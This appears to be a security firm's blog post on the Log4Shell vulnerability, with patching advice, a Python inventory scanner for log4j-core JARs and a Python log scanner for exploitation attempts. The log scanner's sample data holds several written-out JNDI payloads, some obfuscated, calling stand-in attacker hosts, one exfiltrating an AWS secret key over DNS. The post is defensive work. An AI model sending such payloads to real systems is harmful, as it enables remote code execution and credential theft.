Log4j - Has your business been affected? What next?
CVE-2021-44228, the Log4j vulnerability now widely known as Log4Shell, has hit mainstream news, and rightly so. At board level, the NCSC has issued some excellent guidance here on the steps executive teams should be taking.
The vulnerability itself is trivial to exploit and extremely prevalent. Log4j is embedded in a significant number of commercial products as well as in-house systems across thousands of enterprises. An attacker only needs to get a specially crafted string into something your application logs (an HTTP header, a username, a chat message, a search term); a vulnerable version treats that string as a JNDI lookup, connects out to the attacker's LDAP or RMI server, and fetches and executes attacker-supplied code, giving arbitrary code execution on your systems. This can result in ransomware, cryptominers, data exfiltration and a plethora of other major issues.
To add fuel to the fire, organisations that patched to the version recommended for the original vulnerability (2.15.0) may still not be fully protected against the follow-on issues found since; these are less severe, but still need addressing. We therefore recommend reviewing your assets further and ensuring, where possible, that you are running Log4j 2.17.0 or later, or that you have applied other mitigations such as removing the JndiLookup class from the classpath. Mitigations need verifying per deployment: a product that bundles its own copy of Log4j is not fixed by patching the copy your own code uses.
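To make that asset review concrete, here is an added example written for this post (it is not one of the tools the post links to). It walks a directory tree, opens every JAR, WAR, EAR and ZIP, recurses into archives nested inside them, and reports each copy of log4j-core it finds: the version is read from the Maven pom.properties where present, from the filename otherwise, and reported as unknown when only the presence of the JndiLookup class gives the library away (a shaded or renamed copy). It assumes the 2.17.0 target applies to the main 2.x line; the Java 7 and Java 6 back-port branches (2.12.x and 2.3.x) have their own fixed releases and will show up here as below target, so check those by hand. The fixture it scans when run without arguments is constructed.

```python
"""Inventory Log4j 2 core JARs under a directory tree, including copies nested in WAR/EAR files.
Added example for this post, not a tool it links to. Assumption: TARGET is compared on the main
2.x line; the Java 7 and Java 6 back-port branches (2.12.x, 2.3.x) have their own fixed releases
and show up here as below-target, so check those by hand. The demo fixture is constructed."""
import io
import re
import sys
import tempfile
import zipfile
from pathlib import Path

TARGET = (2, 17, 0)
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NAME_RE = re.compile(r"log4j-core-(\d+\.\d+(?:\.\d+)?)\.jar$")
ARCHIVE_SUFFIXES = {".jar", ".war", ".ear", ".zip"}

def parse_version(text):
    """'2.14.1' -> (2, 14, 1), padded to three parts; None if not purely numeric."""
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts):
        return None
    return (tuple(int(p) for p in parts) + (0, 0, 0))[:3]

def version_from_props(raw):
    """Read the version= line of a Maven pom.properties file."""
    for line in raw.decode("utf-8", "replace").splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return parse_version(value)
    return None

def inspect_archive(data, where):
    """Yield (location, version or None) for log4j-core in an archive, recursing into nested ones.
    Identified by pom.properties, else the filename, else bare JndiLookup.class (shaded copy)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        by_name = NAME_RE.search(where)
        if POM_PROPS in names:
            yield where, version_from_props(zf.read(POM_PROPS))
        elif by_name:
            yield where, parse_version(by_name.group(1))
        elif JNDI_CLASS in names:
            yield where, None
        for name in names:
            if Path(name).suffix.lower() in ARCHIVE_SUFFIXES:
                yield from inspect_archive(zf.read(name), f"{where}!/{name}")

def classify(version):
    """'ok' at or above TARGET, 'below-target' under it, 'unknown' when no version was readable."""
    if version is None:
        return "unknown"
    return "ok" if version >= TARGET else "below-target"

def scan_tree(root):
    """Return {location relative to root: (version, status)} for every log4j-core copy found."""
    root = Path(root)
    found = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            rel = path.relative_to(root).as_posix()
            for loc, ver in inspect_archive(path.read_bytes(), rel):
                found[loc] = (ver, classify(ver))
    return found

def _zip_bytes(entries):
    """Build an in-memory JAR/WAR from {entry name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

def _props(version):
    return f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n".encode()

def build_demo_tree(root):
    """Constructed fixture: a patched JAR, an old JAR buried in a WAR, and a shaded copy."""
    root = Path(root)
    (root / "log4j-core-2.17.0.jar").write_bytes(_zip_bytes({POM_PROPS: _props("2.17.0"), JNDI_CLASS: b""}))
    inner = _zip_bytes({POM_PROPS: _props("2.14.1"), JNDI_CLASS: b""})
    (root / "app.war").write_bytes(_zip_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": inner}))
    (root / "vendor-all.jar").write_bytes(_zip_bytes({JNDI_CLASS: b"", "com/vendor/App.class": b""}))

def demo():
    """Build the fixture in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for loc, (ver, status) in sorted(results.items()):
        print(f"{status:13} {'.'.join(map(str, ver)) if ver else '?':8} {loc}")
```

Run it with a directory as the argument to scan a real tree; without one it builds and scans the constructed fixture. Treat both "below-target" and "unknown" as items for follow-up. Note that a JAR whose JndiLookup class was deleted as a mitigation still carries its old version metadata, so it is reported as below target; confirm the class is really gone before closing that finding.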
Unfortunately, we're still encountering a lot of businesses that fall into one or more of these categories:
- Believing they aren't affected without having carried out any kind of assessment or review.
- Not being aware of the original issue or of the subsequent ones.
- Having incomplete asset registers, and so having missed critical, vulnerable devices and services.
If any of the above applies to you, we strongly recommend talking to your IT team or Managed Service Provider about fully testing and remediating your environment, and potentially undertaking activities that assume you have already been breached, such as reviewing logs for exploitation attempts and checking for the indicators of compromise in the links below.
Once again, this issue highlights the need for comprehensive asset management to allow rapid remediation. We've been assisting businesses with this process throughout, but the time to ensure you have an up-to-date and comprehensive asset register is never in the middle of an incident.
Useful Links
- CISA have collated a list of known affected vendors here
- Thinkst Canary have released a free CanaryToken that can trigger an alert when inserted into vulnerable inputs
- The CERT Coordination Center have made their scanner publicly available
- There's a Burp extension to assist with scanning (by browsing your sites in Burp)
- We've found this Log4Shell detector to be efficient at reviewing logs
- GreyNoise is providing IOCs for CVE-2021-44228 Apache Log4j RCE attempts on GitHub. You can access the C2/callback domains here and the latest IPs here.
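The crafted strings described above rarely arrive in logs as a plain `${jndi:...}`; attackers URL-encode them and hide the prefix behind nested lookups to slip past simple greps and WAF rules. As an added example written for this page (not the Log4Shell detector linked above or any other tool mentioned here), the following Python scanner undoes those tricks, namely URL-encoding, `${lower:}`/`${upper:}`, `${name:-default}` and `${date:'...'}` lookups nested inside the jndi prefix, and then reports the callback scheme and host so they can be compared with IOC feeds such as the GreyNoise lists. The log lines, IP addresses and hostnames in it are constructed.

```python
"""Scan log lines for Log4Shell (CVE-2021-44228) exploitation attempts. Added example for
this post, not the detector it links to; SAMPLE_LOGS are constructed lines using
documentation IP ranges and example hostnames."""
import re
import sys
import urllib.parse
from pathlib import Path

# Innermost ${...} lookup: a body with no nested braces, so it can be resolved first.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation. The host may still contain a lookup such as
# ${env:...} that only the victim process could expand (used for exfiltration over DNS).
JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):(?://)?(?P<host>(?:\$\{[^{}]*\}|[^/:{}])+)", re.I
)


def resolve_inner(body):
    """Collapse one innermost lookup body as Log4j 2 would, or return None to keep it.

    ${anything:-default} yields the default (attackers pick names that do not resolve),
    ${lower:x}/${upper:x} change case and ${date:'x'} yields the quoted literal.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if not sep:
        return None
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    if name == "date" and len(arg) >= 2 and arg[0] == arg[-1] == "'":
        return arg[1:-1]
    return None


def normalize(line):
    """URL-decode, then resolve nested lookups inside-out until nothing changes."""
    s = urllib.parse.unquote(line)

    def repl(m):
        r = resolve_inner(m.group(1))
        return m.group(0) if r is None else r

    for _ in range(32):  # real payloads nest a handful of levels; bound the work anyway
        new = LOOKUP.sub(repl, s)
        if new == s:
            break
        s = new
    return s


def detect(line):
    """Return {'scheme', 'host', 'normalized'} if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group("scheme").lower(), "host": m.group("host"), "normalized": norm}


def scan(lines):
    """Yield (1-based line number, hit) for every matching line."""
    for n, line in enumerate(lines, 1):
        hit = detect(line)
        if hit:
            yield n, hit


SAMPLE_LOGS = [
    # plain payload in the User-Agent of an access-log entry
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    # prefix and scheme hidden behind ${lower:} lookups
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.attacker.example/a}"',
    # URL-encoded in the query string, with ${::-j} default-value obfuscation
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fcallback.attacker.example%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # default values of an unset environment variable spelling out the prefix
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://c2.attacker.example:1389/x}"',
    # DNS exfiltration of a secret only the victim could resolve
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.exfil.attacker.example}"',
    # benign: mentions jndi, and uses a legitimate default lookup
    '203.0.113.10 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/jndi-lookups.html HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    'INFO  AppConfig - loaded data dir ${sys:app.data:-/var/lib/app}',
]


def demo():
    """Run the scanner over SAMPLE_LOGS and return [(line_no, scheme, host)]."""
    return [(n, hit["scheme"], hit["host"]) for n, hit in scan(SAMPLE_LOGS)]


if __name__ == "__main__":
    lines = Path(sys.argv[1]).read_text(errors="replace").splitlines() if len(sys.argv) > 1 else SAMPLE_LOGS
    for n, hit in scan(lines):
        print(f"line {n}: {hit['scheme']} -> {hit['host']}")
```

Point it at a web server access log, a reverse-proxy log or an application log (anything an attacker-controlled string could reach) to list the callback hosts seen, then check those against the IOC lists above. A hit proves an attempt, not a compromise; whether the application resolved the lookup depends on the Log4j version and configuration behind that log line, so treat every hit against an unpatched host as a reason to look for outbound LDAP, RMI or DNS traffic to the reported host around that timestamp.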
If you need further assistance, or aren't sure what the next steps should be for your business, then please get in touch.